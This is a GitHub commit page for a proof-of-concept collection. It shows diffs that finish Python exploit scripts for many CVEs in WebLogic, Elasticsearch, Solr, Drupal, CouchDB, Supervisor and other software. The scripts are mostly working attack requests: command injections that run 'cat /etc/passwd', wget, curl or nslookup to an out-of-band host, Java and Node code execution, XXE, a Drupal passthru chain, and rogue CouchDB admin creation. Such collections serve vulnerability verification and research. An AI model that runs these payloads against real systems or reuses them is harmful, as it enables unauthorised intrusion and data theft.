Skip to content

Commit

Permalink
add pocsploit pocs
Browse files Browse the repository at this point in the history
  • Loading branch information
cckuailong committed Mar 19, 2022
1 parent ba76e6b commit 42a5133
Show file tree
Hide file tree
Showing 93 changed files with 472 additions and 304 deletions.
6 changes: 4 additions & 2 deletions 2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py
Original file line number Diff line number Diff line change
Expand Up @@ -33,18 +33,20 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
username = "amdin"
password = ""
try:
url = format_url(url)

path = """/axis2-admin/login"""
method = "POST"
data = """loginUsername={{username}}&loginPassword={{password}}"""
data = """loginUsername={username}&loginPassword={password}""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

path = """/axis2/axis2-admin/login"""
method = "POST"
data = """userName={{username}}&password={{password}}&submit=+Login+"""
data = """userName={username}&password={password}&submit=+Login+""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

Expand Down
33 changes: 17 additions & 16 deletions 2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
import requests
import re


# Vuln Base Info
Expand Down Expand Up @@ -39,24 +40,24 @@ def poc(url):

path = """/_search?pretty"""
method = "POST"
data = """{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
data = {
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}"""
headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

if ("""application/json""" in str(resp0.headers)) and (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200):
result["success"] = True
Expand Down
4 changes: 2 additions & 2 deletions 2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py
Original file line number Diff line number Diff line change
Expand Up @@ -40,13 +40,13 @@ def poc(url):

oob_domain,flag = gen_oob_domain()

path = """/backupmgt/localJob.php?session=fail;wget http://oob_domain;"""
path = """/backupmgt/localJob.php?session=fail;wget http://{oob_domain};""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

path = """/backupmgt/pre_connect_check.php?auth_name=fail;wget http://oob_domain;"""
path = """/backupmgt/pre_connect_check.php?auth_name=fail;wget http://{oob_domain};""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
Expand Down
1 change: 1 addition & 0 deletions 2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
import requests
import re


# Vuln Base Info
Expand Down
3 changes: 2 additions & 1 deletion 2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py
Original file line number Diff line number Diff line change
Expand Up @@ -32,6 +32,7 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
username = "admin"
try:
url = format_url(url)

Expand All @@ -43,7 +44,7 @@ def poc(url):

path = """/wp-login.php?action=lostpassword"""
method = "POST"
data = """wp-submit=Get+New+Password&redirect_to=&user_login={{username}}"""
data = """wp-submit=Get+New+Password&redirect_to=&user_login={username}""".format(username=username)
headers = {'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

Expand Down
3 changes: 1 addition & 2 deletions 2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
Original file line number Diff line number Diff line change
Expand Up @@ -20,8 +20,7 @@ def info():
"cwe-id": "CWE-89"
},
"metadata":{
"vuln-target": "",

"vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2016/CVE-2016-10940/vultarget"
},
"tags": ["cve", "cve2016", "sqli", "wp", "wordpress", "wp-plugin", "authenticated"],
}
Expand Down
4 changes: 2 additions & 2 deletions 2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py
Original file line number Diff line number Diff line change
Expand Up @@ -58,15 +58,15 @@ def poc(url):
<string>-c</string>
</void>
<void index="2">
<string>nslookup oob_domain</string>
<string>nslookup {oob_domain}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""
</soapenv:Envelope>""".format(oob_domain=oob_domain)
headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'text/xml'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

Expand Down
4 changes: 2 additions & 2 deletions 2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py
Original file line number Diff line number Diff line change
Expand Up @@ -46,10 +46,10 @@ def poc(url):
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>nslookup oob_domain</string>
<string>nslookup {oob_domain}</string>
</param>
</params>
</methodCall>"""
</methodCall>""".format(oob_domain=oob_domain)
headers = {'Accept': 'text/xml', 'Content-type': 'text/xml'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

Expand Down
2 changes: 1 addition & 1 deletion 2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ def poc(url):
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

path = """/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2Foob_domain%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser"""
path = """/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{oob_domain}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
Expand Down
16 changes: 8 additions & 8 deletions 2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py
Original file line number Diff line number Diff line change
Expand Up @@ -37,15 +37,15 @@ def poc(url):

path = """/_users/org.couchdb.user:poc"""
method = "PUT"
data = """{
"type": "user",
"name": "poc",
"roles": ["_admin"],
"roles": [],
"password": "123456"
}"""
data = {
"type": "user",
"name": "poc",
"roles": ["_admin"],
"roles": [],
"password": "123456"
}
headers = {'Accept': 'application/json'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

if ("""application/json""" in str(resp0.headers) and """""" in str(resp0.headers)) and ("""org.couchdb.user:poc""" in resp0.text and """conflict""" in resp0.text and """Document update conflict""" in resp0.text) and (resp0.status_code == 201 or resp0.status_code == 409):
result["success"] = True
Expand Down
2 changes: 1 addition & 1 deletion 2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@ def poc(url):

oob_domain,flag = gen_oob_domain()

path = """/webadmin/script?command=|%20nslookup%20oob_domain"""
path = """/webadmin/script?command=|%20nslookup%20{oob_domain}""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
Expand Down
4 changes: 2 additions & 2 deletions 2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py
Original file line number Diff line number Diff line change
Expand Up @@ -47,7 +47,7 @@ def poc(url):
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://oob_domain</string>
<string>http://{oob_domain}</string>
</void>
<void idref="url">
<void id="stream" method ="openStream"/>
Expand All @@ -56,7 +56,7 @@ def poc(url):
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""
</soapenv:Envelope>""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'text/xml;charset=UTF-8', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

Expand Down
2 changes: 1 addition & 1 deletion 2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@ def poc(url):

oob_domain,flag = gen_oob_domain()

path = """/plugins/servlet/oauth/users/icon-uri?consumerUri=http://oob_domain"""
path = """/plugins/servlet/oauth/users/icon-uri?consumerUri=http://{oob_domain}""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
Expand Down
4 changes: 2 additions & 2 deletions 2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py
Original file line number Diff line number Diff line change
Expand Up @@ -42,13 +42,13 @@ def poc(url):

path = """/system/sharedir.php"""
method = "POST"
data = """&uid=10; wget http://oob_domain"""
data = """&uid=10; wget http://{oob_domain}""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

path = """/en/php/usb_sync.php"""
method = "POST"
data = """&act=sync&task_number=1;wget http://oob_domain"""
data = """&act=sync&task_number=1;wget http://{oob_domain}""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

Expand Down
2 changes: 1 addition & 1 deletion 2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py
Original file line number Diff line number Diff line change
Expand Up @@ -42,7 +42,7 @@ def poc(url):

path = """/upload"""
method = "POST"
data = """logtype=XML&timezone=1%3Bwget+http%3A%2F%2Foob_domain%3B"""
data = """logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{oob_domain}%3B""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

Expand Down
2 changes: 1 addition & 1 deletion 2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py
Original file line number Diff line number Diff line change
Expand Up @@ -56,7 +56,7 @@ def poc(url):
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"'''
headers = {'Accept': 'application/json', 'Referer': ' {{Hostname}}/user/register', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------99533888113153068481322586663'}
headers = {'Accept': 'application/json', 'Referer': '%s/user/register' % url, 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------99533888113153068481322586663'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

if ("""application/json""" in str(resp0.headers)) and (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200):
Expand Down
36 changes: 27 additions & 9 deletions 2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py
Original file line number Diff line number Diff line change
@@ -1,4 +1,6 @@
import requests
import re
from urllib import parse


# Vuln Base Info
Expand All @@ -19,8 +21,7 @@ def info():
"cwe-id": ""
},
"metadata":{
"vuln-target": "",

"vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2018/CVE-2018-7602/vultarget"
},
"tags": ["cve", "cve2018", "drupal", "authenticated"],
}
Expand All @@ -33,34 +34,51 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
username = "drupal"
password = "drupal"
try:
url = format_url(url)

s = requests.Session()

path = """/?q=user%2Flogin"""
method = "POST"
data = """form_id=user_login&name={{username}}&pass={{password}}&op=Log+in"""
data = """form_id=user_login&name={username}&pass={password}&op=Log+in""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
tmp = re.search(r'<meta about="([/a-z0-9]+)" property="foaf', resp0.text)
if tmp:
userid = parse.quote(tmp.group())
else:
return result

path = """/?q={{url_encode("{{userid}}")}}%2Fcancel"""
path = """/?q={userid}%2Fcancel""".format(userid=userid)
method = "GET"
data = """"""
headers = {}
resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
tmp = re.search(r'<input type="hidden" name="form_token" value="(.*)" />', resp1.text)
if tmp:
form_token = tmp.group()
else:
return result

path = """/?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev"""
path = """/?q={userid}%2Fcancel&destination={userid}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev""".format(userid=userid)
method = "POST"
data = """form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account"""
data = """form_id=user_cancel_confirm_form&form_token={form_token}&_triggering_element_name=form_id&op=Cancel+account""".format(form_token=form_token)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp2 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
tmp = re.search(r'<input type="hidden" name="form_build_id" value="(.*)" />', resp1.text)
if tmp:
form_build_id = tmp.group()
else:
return result

path = """/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}}"""
path = """/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{form_build_id}""".format(form_build_id=form_build_id)
method = "POST"
data = """form_build_id={{form_build_id}}"""
data = """form_build_id={form_build_id}""".format(form_build_id=form_build_id)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp3 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
resp3 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=True)

if ("""CVE-2018-7602-POC""" in resp3.text):
result["success"] = True
Expand Down
2 changes: 1 addition & 1 deletion 2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py
Original file line number Diff line number Diff line change
Expand Up @@ -49,7 +49,7 @@ def poc(url):

path = """/solr/{{core}}/dataimport?indent=on&wt=json"""
method = "POST"
data = """command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://oob_domain%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport"""
data = """command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{oob_domain}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport""".format(oob_domain=oob_domain)
headers = {'Content-type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

Expand Down
2 changes: 1 addition & 1 deletion 2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py
Original file line number Diff line number Diff line change
Expand Up @@ -42,7 +42,7 @@ def poc(url):

path = """/checkValid"""
method = "POST"
data = """document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://oob_domain")"""
data = """document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{oob_domain}")""".format(oob_domain=oob_domain)
headers = {'Authorization': 'Basic YWRtaW46cGFzcw==', 'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

Expand Down
Loading

0 comments on commit 42a5133

Please sign in to comment.